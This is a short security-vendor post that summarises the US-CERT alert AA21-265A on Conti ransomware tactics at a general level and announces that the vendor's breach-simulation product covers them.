Existing Coverage in SafeBreach Hacker’s Playbook for US-CERT Alert (AA21-265A)- Conti Ransomware
US Cert Alerts
On September 22nd, the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) alerted about the increased use of Conti ransomware in more than 400 attacks on U.S. and international organizations. Details of the various tactics, techniques, and procedures (TTPs) are described in US-CERT Alert (AA21-265A) – Conti Ransomware. Threat actors leveraging Conti Ransomware steal files, encrypt servers and workstations and demand a ransom payment.
Conti ransomware uses the ransomware-as-a-service (RaaS) model and threat actors leveraging Conti ransomware often gain access to organizations in one of the following ways:
According to the details provided by CISA and FBI, the ransomware during its execution phase, uses Router Scan, a penetration testing tool, to maliciously scan for and brute force routers, cameras, and network-attached storage devices with web interfaces. Threat actors have also been observed to use Kerberos attacks in an attempt to get the Admin hash to conduct brute force attacks. CISA and FBI also observed that Conti actors are known to exploit legitimate remote monitoring and management software and remote desktop software as backdoors to maintain persistence on victim networks.
During the exfiltration phase, Conti actors often use the open-source Rclone command line program. After the actors steal and encrypt the victim's sensitive data, they employ a double extortion technique in which they demand the victim pay a ransom for the release of the encrypted data and threaten the victim with the public release of the data if the ransom is not paid.
The existing attack methods for US-CERT AA21-265A Conti Ransomware are already in the SafeBreach Hacker’s playbook and ready to be run across your simulators. The Known Attack Series report is updated so you can run the specific attacks from this US-CERT alert. From the Known Attack Series report, select the US-CERT AA21-265A (Conti Ransomware) report and select Run Simulations which will run all attack methods.